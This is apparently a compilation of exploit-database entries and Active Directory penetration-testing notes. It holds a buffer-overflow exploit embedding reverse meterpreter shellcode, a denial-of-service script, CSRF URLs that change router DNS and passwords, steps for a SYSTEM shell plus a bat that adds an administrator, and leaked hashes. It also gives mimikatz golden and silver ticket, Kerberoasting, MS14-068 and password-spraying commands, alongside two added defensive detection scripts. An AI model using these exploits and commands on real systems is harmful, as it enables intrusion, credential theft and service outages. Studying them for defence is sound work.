# Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account
# Date: 27/02/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
# Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
# Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
# Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
# CVE : CVE-2017-6351
The WiPG-1500 device embeds a firmware with a manufacturer account that has a hard-coded username / password.
Once the device is set in DEBUG mode, an attacker can connect to the device using the telnet protocol and log in to the device with the 'abarco' hard-coded manufacturer account.
Neither this account, the DEBUG feature, nor the use of telnetd on port TCP/5885 (when debug mode is ON) is documented.
Here's the extract of the Linux 'passwd' file:
root:x:0:0:root:/home:/bin/sh
abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh
and the 'shadow':
root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::
This vulnerability has been reported to the vendor, but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. The vendor has removed the 'abarco' account on the newest models, but don't worry, DEBUG mode is still there with telnetd, and you can also use the r00t account with a home and /bin/sh on the other systems in any case.
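An audit of an extracted firmware's account database in the spirit of this advisory (added example, not the advisory author's code): it parses passwd and shadow and flags every account that can actually log in but is undocumented, root-equivalent by uid or primary group, password-less, or protected only by a weak crypt scheme. The sample input is the two passwd and two shadow lines quoted above; the list of documented accounts is an assumption.

```python
from typing import Dict, List, Tuple

# Constructed sample input: the passwd and shadow lines quoted in the advisory.
PASSWD_SAMPLE = (
    "root:x:0:0:root:/home:/bin/sh\n"
    "abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh\n"
)
SHADOW_SAMPLE = (
    "root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::\n"
    "abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::\n"
)
# Assumption for this example: the vendor documents only the 'root' account.
DOCUMENTED_ACCOUNTS = {"root"}
NOLOGIN_SHELLS = {"/bin/false", "/bin/nologin", "/sbin/nologin", "/usr/sbin/nologin"}
# crypt(3) prefixes; md5crypt and legacy DES are cheap to crack offline once the
# firmware image (and thus the static hash) is public.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}


def parse_passwd(text: str) -> Dict[str, dict]:
    """Map user name -> uid/gid/gecos/home/shell; GECOS may itself contain commas."""
    users: Dict[str, dict] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[0]:
            continue  # blank, comment or malformed line
        name, _pw, uid, gid, gecos, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user name -> password hash field (may be empty, '*' or '!...')."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            hashes[fields[0]] = fields[1]
    return hashes


def hash_algorithm(h: str) -> str:
    """Name the crypt scheme; anything unprefixed but non-empty is legacy DES crypt."""
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    return "descrypt" if h else "none"


def audit_accounts(passwd_text: str, shadow_text: str,
                   documented=DOCUMENTED_ACCOUNTS) -> List[Tuple[str, List[str]]]:
    """Return (name, reasons) for every account that can log in and looks suspect."""
    shadow = parse_shadow(shadow_text)
    findings: List[Tuple[str, List[str]]] = []
    for name, ent in parse_passwd(passwd_text).items():
        h = shadow.get(name, "*")  # no shadow entry: treat as locked
        if ent["shell"] in NOLOGIN_SHELLS or h.startswith(("*", "!")):
            continue  # password login impossible; not a backdoor-account risk
        reasons: List[str] = []
        if name not in documented:
            reasons.append("undocumented-login")
        if ent["uid"] == 0 and name != "root":
            reasons.append("uid0")
        if ent["gid"] == 0 and name != "root":
            reasons.append("gid0")  # primary group root: reads anything group-root owns
        if h == "":
            reasons.append("empty-password")
        if hash_algorithm(h) in ("md5crypt", "descrypt"):
            reasons.append("weak-hash")
        if reasons:
            findings.append((name, reasons))
    return findings
```

On the sample, 'abarco' is reported as an undocumented login whose primary group is 0, and both accounts carry md5crypt hashes that a public firmware image exposes to offline cracking.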
# Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
# Version: 1.5.18
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : requested
# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets shown below.
# The 1st part can be at most 236 bytes.
# The 2nd part can be at most 76 bytes (leave at least 4 NOPs).
import socket
# QtGui4.dll 0x6527635E - CALL ESP
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
#IP: 192.168.198.128, PORT: 4444
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on SMTP port: '+str(port)
print(len(rev_met_1))
print(len(rev_met_2))
while True:
    conn, addr = s.accept()
    conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
    conn.close()
Author : B GOVIND
Exploit Title : DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing ‘admin’ privilege
Date : 01-03-2017
Vendor Homepage : http://www.dlink.co.in
Firmware Link : ftp://support.dlink.co.in/firmware/DSL-2730U
Affected version : Hardware ver C1, Firmware ver: IN_1.0.0
Email id : govindnair7102@gmail.com
CVE : CVE-2017-6411
Change DNS Configuration Bypassing ‘admin’ Privilege
-------------------------------------------------------
The D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts: ‘admin’, ‘support’ and ‘user’. As per D-Link, only the ‘admin’ account has unrestricted access to change the device configuration. The ‘user’ account can only view configuration settings and statistics.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate dnscfg.cgi on this device. An insider or an external attacker (remote management must be enabled for an external attacker) can change the primary and secondary DNS IP addresses to malicious IP addresses without using the ‘admin’ account.
2. Proof of Concept
Use the following URL to modify the DNS entries:
http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
Here x.x.x.x and y.y.y.y are the malicious IP addresses the attacker can use.
3. Impact of vulnerability
Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information such as a user's browsing profile. Modifying the device DNS settings allows cybercriminals to perform malicious activities like the following:
(a) Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoof well-known sites and trick users into submitting sensitive credentials such as bank account usernames and passwords.
(b) Ensure that no more patches are downloaded from OS vendor sites or firewall sites.
(c) Replace ads on legitimate sites and serve users unwanted/fake ads.
(d) Push malware.
4. Solution
As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability and prevents the privilege escalation.
All users of this hardware should change the default passwords of not just the ‘admin’ account but also ‘user’ and ‘support’.
Change All Account Password Bypassing ‘admin’ Privilege
----------------------------------------------------------
The D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts: ‘admin’, ‘support’ and ‘user’. As per D-Link, only the ‘admin’ account has unrestricted access to change the device configuration. The ‘user’ account can only view configuration settings and statistics. The default passwords of the admin, support and user accounts are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate password.cgi on this device. An insider or an external attacker (remote management must be enabled for an external attacker) can change the passwords of all three accounts without using the ‘admin’ account.
2. Proof of Concept
This exploit works only when the accounts are using their default passwords.
(a) Use the following URL to change the ‘admin’ account password from ‘admin’ to ‘admin1’.
http://user:user@192.168.1.1/password.cgi?inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
(b) Use the following URL to change the ‘support’ account password from ‘support’ to ‘support1’.
http://user:user@192.168.1.1/password.cgi?inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
(c) Use the following URL to change the ‘user’ account password from ‘user’ to ‘user1’.
http://user:user@192.168.1.1/password.cgi?inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both password strings are base64 encoded, for confidentiality, as the connection between the browser and the web server uses plain HTTP.
3. Impact of vulnerability
Elevation of Privilege, Information Disclosure, Denial of Service
(a) An insider/attacker can change the passwords of all the existing accounts and control the device as required. This results in the attacker having complete control over the device: they can capture and analyse other users' traffic, and deny services as they choose.
4. Solution
As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability. All users of this hardware should change the default passwords of all the default accounts.
Enable/Disable LAN side Firewall without admin privilege
---------------------------------------------------------
The D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts: ‘admin’, ‘support’ and ‘user’. As per D-Link, only the ‘admin’ account has unrestricted access to change the device configuration. The ‘user’ account can only view configuration settings and statistics. The default passwords of the admin, support and user accounts are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate lancfg2.cgi on this device. An insider or an external attacker (remote management must be enabled for an external attacker) can enable/disable the LAN-side firewall without ‘admin’ privilege, using the ‘user’ account.
2. Proof of Concept
Use the following URL to enable the LAN-side firewall:
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
Use the following URL to disable the LAN-side firewall:
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
3. Impact of vulnerability
By disabling the LAN-side firewall and enabling Port Triggering, an attacker can ensure backdoor access from the LAN side as well as from the WAN side.
The attacker can run port-scanning tools to map services, which otherwise would not be possible with the firewall enabled.
4. Solution
As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability. All users of this hardware should change the default passwords of all the default accounts.
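Detection logic for the three CSRF issues above, written as an added example rather than anything from the advisory: it scans HTTP access-log lines (constructed here, in Common Log Format with referer and user-agent) for state-changing requests to dnscfg.cgi, password.cgi and lancfg2.cgi, and notes when the change was made via GET, by a non-admin account, or with a referer from another site. The log format, the router address 192.168.1.1 and the 'admin'-only allow-list are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Endpoints and the parameters whose presence changes router state (from the advisory).
STATE_CHANGING = {
    "/dnscfg.cgi": {"dnsPrimary", "dnsSecondary"},
    "/password.cgi": {"inPassword"},
    "/lancfg2.cgi": {"enblLanFirewall", "enblDhcpSrv"},
}
PRIVILEGED_ACCOUNTS = {"admin"}
ROUTER_HOSTS = {"192.168.1.1"}  # assumption: the router's own LAN address

# host ident authuser [time] "method target proto" status bytes "referer" "user-agent"
CLF = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
                 r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')

# Constructed sample log: a CSRF-style DNS change by 'user' lured from another site,
# a harmless page view, a scripted password change, and a firewall change made by
# 'admin' from the router's own UI.
SAMPLE_LOG = """\
192.168.1.5 - user [01/Mar/2017:10:00:01 +0530] "GET /dnscfg.cgi?dnsPrimary=203.0.113.9&dnsSecondary=203.0.113.10&dnsIfcsList=&dnsRefresh=1 HTTP/1.1" 200 512 "http://lure.example/offer.html" "Mozilla/5.0"
192.168.1.5 - admin [01/Mar/2017:10:01:10 +0530] "GET /dnscfg.cgi HTTP/1.1" 200 2048 "http://192.168.1.1/index.html" "Mozilla/5.0"
192.168.1.7 - user [01/Mar/2017:10:02:33 +0530] "GET /password.cgi?inUserName=admin&inPassword=QUFBQQ==&inOrgPassword=YWRtaW4= HTTP/1.1" 200 300 "-" "curl/7.52.1"
192.168.1.5 - admin [01/Mar/2017:10:05:00 +0530] "GET /lancfg2.cgi?ethIpAddress=192.168.1.1&enblLanFirewall=0&enblDhcpSrv=1 HTTP/1.1" 200 600 "http://192.168.1.1/lancfg2.html" "Mozilla/5.0"
"""


def classify_request(line: str) -> Dict[str, object]:
    """Return {} for lines that change no state; otherwise a finding with its reasons."""
    m = CLF.match(line)
    if not m:
        return {}
    parts = urlsplit(m.group("target"))
    watched = STATE_CHANGING.get(parts.path)
    if watched is None:
        return {}
    params = set(parse_qs(parts.query, keep_blank_values=True))
    changed = params & watched
    if not changed:
        return {}  # e.g. merely loading the configuration page
    reasons: List[str] = []
    if m.group("method") == "GET":
        reasons.append("get-state-change")  # a GET that changes state is what makes the CSRF a one-liner
    if m.group("user") not in PRIVILEGED_ACCOUNTS:
        reasons.append("non-admin-account")  # the privilege bypass the advisory describes
    referer = m.group("referer") or "-"
    if referer != "-" and urlsplit(referer).hostname not in ROUTER_HOSTS:
        reasons.append("cross-site-referer")  # request was triggered from another origin
    return {"src": m.group("src"), "user": m.group("user"), "path": parts.path,
            "changed": sorted(changed), "reasons": reasons}


def scan_log(text: str) -> List[Dict[str, object]]:
    """All findings for a multi-line log, in log order."""
    return [f for f in (classify_request(l) for l in text.splitlines()) if f]
```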
# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
# Date: 02/27/2017
# Exploit Author: @Pcchillin
# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
# Version: 4.3.04027 and earlier
# Tested on: Windows 10
# CVE : CVE-2017-3813
# Vendor ID : cisco-sa-20170208-anyconnect
#Run CMD.EXE with system privileges
1. Start Cisco AnyConnect from the logon screen.
2. Once the Cisco app comes up (where you can select a profile and hit Connect), hold CTRL and hit B.
3. When the Cisco About window appears, select the URL at the bottom. This will open Internet Explorer, or you can select Chrome if it is installed.
4. Once Internet Explorer is started, press CTRL-O, then select Browse. In Chrome, press CTRL-O and Explorer will open.
5. You can then navigate to the C:\Windows\System32\ folder, find cmd.exe, then right-click and select Run as administrator.
#Run scripts from USB flash drive
Follow the steps above, navigate to the flash drive, right-click and select Run. You can also edit the document.
Example bat script:
Net user #USERNAME #PASSWORD /add
Net localgroup administrators #USERNAME /add
#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
#Twitter handle @pcchillin
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6371
import socket
import time
import sys
try:
    host = sys.argv[1]
    port = 80
except IndexError:
    print "[+] Usage %s <host> " % sys.argv[0]
    sys.exit()
exploit = "\x41"*4096
buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+exploit+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
i = 1
while i < 957:
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect((host,port))
        print("[*] Try: "+str(i))
        s.send(buffer)
        s.close()
        i=i+1
    except:
        print("[-] The service seems to be down\r\n")
        break
print("[i] Waiting a few seconds before starting a second attack.\r\n")
time.sleep(25)
print("[*] Second run to trigger the DoS")
i = 1
while i < 957:
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect((host,port))
        print("[*] Try: "+str(i))
        s.send(buffer)
        s.close()
        i=i+1
    except:
        print("[-] The service seems to be down.\r\n")
        break
print("[i] Wait before the final strike.\r\n")
time.sleep(25)
print("[*] Third run to trigger the DoS")
i = 1
while i < 957:
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect((host,port))
        print("[*] Try: "+str(i))
        s.send(buffer)
        s.close()
        i=i+1
    except:
        print("[-] The service seems to be down.\r\n")
        print("[!] It can take a few seconds for the service to crash\r\n")
        break
Information gathering
Commonly used commands: net use
net view
tasklist /v
ipconfig /all
net group /domain  # get the list of all domain user groups
net group "Domain Admins" /domain  # get the list of domain admins
net group "Enterprise Admins" /domain  # get the list of enterprise admins
net localgroup administrators /domain  # get the users of the domain's built-in Administrators group (Enterprise Admins, Domain Admins)
net group "Domain Controllers" /domain  # get the list of domain controllers
net group "Domain Computers" /domain  # get the list of all domain member computers
net user /domain  # get the list of all domain users
net user SomeUser /domain  # get detailed information about the specified account SomeUser
net accounts /domain  # get the domain password policy: password length, lockout thresholds and other settings
nltest /domain_trusts  # get domain trust information
SPN scan: setspn -T target.com -Q */*
If the current host uses the internal DNS, the DNS records can be queried to locate the domain controllers.
nslookup -type=all _ldap._tcp.dc._msdcs.rootkit.org
ipconfig /all
Ports: 88, 389, 53. Machines where domain admins are logged on:
PowerPick Find-DomainUserLocation -UserIdentity Administrator  # view user location
Get-UserEvent
PowerPick Invoke-EventHunter  # view logs
Data collection
# List shares
net share
# List network computers
net view
# List shares on a remote PC
net view computer_name /all  # list shares on the local host
wmic share get /format:list
# List shares on a remote PC
wmic /node:computer_name share
Find computer names related to "file" in the domain  # list all domain computers and filter those with "file" in the name
net group "Domain Computers" /domain | findstr 'file'
PowerView cheat sheet: Find-DomainShare
Get-DomainFileServer
Basic information
Database information
https://blog.netspi.com/finding-sensitive-data-domain-servers-using-powerupsql/
Information collection  # find all local SQL instances:
Get-SQLInstanceLocal -Verbose
# Find all SQL instances in the domain/network:
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDP -Verbose
Get details  # enumerate basic information about local SQL instances
Get-SQLInstanceLocal | Get-SQLServerInfo
# Enumerate basic information about remote SQL instances
Get-SQLServerInfo -Instance 'srv-web-kit.rootkit.org'
List the instances the current user can log in to:
Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10
Try to obtain admin rights on an instance:
Invoke-SQLEscalatePriv -Verbose -Instance 'computer_name'
Enumerate using default passwords:
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
Dump database information:
Invoke-SQLDumpInfo -Verbose -Instance 'computer_name'
Use the automated audit:
Invoke-SQLAudit -Verbose -Instance 'computer_name'
Sensitive information
Import-Module PowerUpSQL.psd1
$servers = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10
$accessible = $servers | Where-Object {$_.Status -eq "Accessible"}
$accessible | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card,password" -SampleSize 2 -ValidateCC -NoDefaults | ft -AutoSize
----
Get-SQLColumnSampleData -Verbose -Keyword "card,password" -SampleSize 2 -ValidateCC -NoDefaults -Instance 'server1\instance1'
Cobalt Strike's sqlclient (also used for lateral movement)
github
PowerUpSQL
sqlclient
# Use PowerView to find where a specific user is logged in:
Find-DomainUserLocation -UserIdentity user_name
# Use PowerView to find where the members of a group are logged in:
Find-DomainUserLocation -UserGroupIdentity group_name
Or use SharpSniper, which requires the administrator password:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUserEvent -ComputerName primary.testlab.local -Credential $Cred -MaxEvents 1000
Targeting users
https://github.com/daftack/mailsniper
If you have a user's password, you can read their inbox.
# Autodiscover the target Exchange server and search the mailbox of user@example.com
Invoke-SelfSearch -OutputCsv local-results.csv -Mailbox user@example.com
# Specify a remote Exchange server (here Exchange Online) and search the mailbox of user@example.com
Invoke-SelfSearch -Remote -ExchHostname outlook.office365.com -OutputCsv local-results.csv -Mailbox user@example.com
MailSniper
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
User hunting
https://github.com/hausec/adape-script
PowerShell.exe -ExecutionPolicy Bypass ./adape.ps1
PS: this script performs very large actions similar to BloodHound and generates a large number of requests. All modules are downloaded from GitHub and administrator rights are required. It is suited to offline penetration and authorized testing. It mainly scans for the following:
• Collecting hashes via WPAD, LLMNR and NBT-NS spoofing
• MS14-025
• Collecting account hashes via Kerberoast
• Identifying targets via BloodHound
• Delegation tests
• Finding open SMB shares on the network
• Searching SMB shares for sensitive strings
• Checking system patches on the network
• Finding file servers
• Finding attachments
• A one-click scan of domain policy for collection
Set-ExecutionPolicy Bypass; ./adape.ps1 -All, or the specified modules:
./adape.ps1 -GPP -PView -Kerberoast
Domain vulnerability scanning
.\StandIn.exe --spn
SPN scan
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
First brute-force the usernames, although usually they can be confirmed directly:
./kerbrute_darwin_amd64 userenum -d rootkit.org users.txt
Take the collected passwords and spray them in batches. Finding strong and weak passwords in the domain allows further information gathering.
Import-Module .\SharpHound.ps1
Invoke-BloodHound -Verbose -Domain 'domain.local' -DomainController 'dc01.domain.local' -LdapUser 'targetuser' -LdapPass 'targetpass' -CollectionMethod All
Best query practices:
https://github.com/hausec/bloodhound-custom-queries/blob/master/customqueries.json
https://github.com/integration-it/active-directory-exploite-cheat-cheet/master/f%20-20bloodhound
Using BloodHound without the collector (the ldapsearch way)
Using BloodHound in a Linux environment
Brute force within the domain
Priority 1: request with Rubeus, crack with hashcat.
.\Rubeus.exe kerberoast
hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force
Scan SPN services: https://github.com/nidem/kerberoast/blob/master/getuserspns.ps1
setspn -T 0day.org -Q */*
or
GetUserSPNs.py
The client requests the service from the server side and obtains the ST ticket:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSVC/SRV-WEB-KIT.ROOTKIT.ORG'
Export the ticket: kerberos::list /export
Kerberos: https://GITHUB.com
Or use Invoke-Kerberoast.ps1: Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast returns all the information.
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl
Crack with hashcat:
hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force
Using BloodHound
SPN scan, Kerberoasting
Source: https://github.com/uknowsec/active-directory-pentest-notes/blob/master/notes/%E5%9f%9f%E6%B8%97%E9%80%8F-MS14-068.md
The patch for MS14-068 is KB3011780. Whether this patch is installed on the domain controller can be checked with systeminfo. The PyKEK tool exploits the vulnerability.
MS14-068.exe
MS14-068.exe -u sqladmin@0day.org -p admin!@#45 -s S-1-5-21-1812960810-23355050734-3517558888888888888888888888805-1142 -d owa2010sp3.0day.org
-u is the domain account + @ + domain name, e.g. jerry@rootkit.org
-p is the current user's password, i.e. jerry's password
-s is jerry's SID; a user's SID can be obtained with whoami /all
-d is the domain controller of the current domain. When the script runs successfully, a ccache file is generated in the current directory.
Use it:
mimikatz
klist purge
kerberos::ptc tgt_sqladmin@0day.org.ccache
Access the domain controller:
dir \\owa2010sp3.0day.org\c$
MS14-068 escalation within the domain
goldenpac.exe 0day.org/sqladmin:admin!@#45@owa2010sp3.0day.org
Source: https://3GSTUDENT.github.io/%e5%9F%9F%9F%9F%E6%B88%97%E9%80%8%8%8%8%8 and https://3GSTUDENT.GITHUB.IO/%E5%80%8A%8A%8A%8F-8F-KERBEROAST/ After adding an SPN it can be obtained over time, and after cracking we obtain the plaintext password. For example, when the SPN vnc/dc1.test.com is added to the domain user administrator, the parameters are:
setspn.exe -U -A vnc/dc1.test.com administrator
Any host in the domain can then obtain this SPN and, as shown in the figure below, use Kerberoast to obtain the TGS, which is cracked with hashcat. The parameters to delete the SPN are:
setspn.exe -D vnc/dc1.test.com administrator
PyKEK
https://GITHUB.COM/UKNOWSEC/ACTIVE-DIRECTORY-Pentest-notes/Blob/Master/Notes/%E5%9F%9F%E6%B8%97%E9%80%8F-Ticket.md
The hash of the krbtgt password is required to generate a golden ticket.
lsadump::dcsync /owa20103.0day.org /user:krbtgt
After obtaining the krbtgt hash, use mimikatz's kerberos::golden function to generate golden.kiribi.
Parameter description:
/admin: the forged username
/domain: the domain name
/sid: the SID value; note that the last component (the RID) is removed.
/krbtgt: the krbtgt hash value
/ticket: the name of the generated ticket
The SID is the part in the red box (of the original screenshot).
kerberos::golden /admin:Administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36F9D9E6D98ECF8307BAF4F46EF842A2 /ticket:golden.kiribi
Import and use with mimikatz:
kerberos::purge
kerberos::ptt golden.kiribi
kerberos::list
goldenpac.exe
Conditions for forging a silver ticket:
1. The domain name
2. The domain SID
3. The password hash of the domain service account (not krbtgt; here it is the domain controller's)
4. The forged username, which can be any username; here it is "silver"
Exploitation process
First, the password hash of the service account must be known. Here the domain controller is again taken as the example. Use mimikatz to view the hashes of the current domain accounts. The administrator account's hash is not used here; the hash of OWA2010SP3$ is used instead.
sekurlsa::logonpasswords
At this point the hash of OWA2010SP3$ has been obtained, and the silver ticket is generated with mimikatz.
Parameter description:
/domain: the current domain name
/sid: the SID value; as with the golden ticket, take the leading part
/target: the target host, here OWA2010SP3.0day.org
/service: the service name; here a shared folder must be accessed, so it is cifs
/rc4: the hash value of the target host
/user: the forged username
/ptt: Pass The Ticket; imports the generated ticket into memory. Alternatively, export the ticket and then import it with kerberos::ptt.
kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-250734-3517558805 /target:OWA2010SP3.0DAY /service:cifs /rc4:125445ED1D553393CCE9585E64E3FA07 /user:silver /ptt
Persistence within the domain
If the root domain SID is known, mimikatz can use the child domain's krbtgt hash to create a ticket carrying the Enterprise Admins group [RID=519] (the highest privilege in the forest).
Then a new golden ticket containing the root domain SID is generated by mimikatz. StartOffset and EndIn give the offset and validity length respectively, and RenewMax the maximum lifetime of the generated ticket.
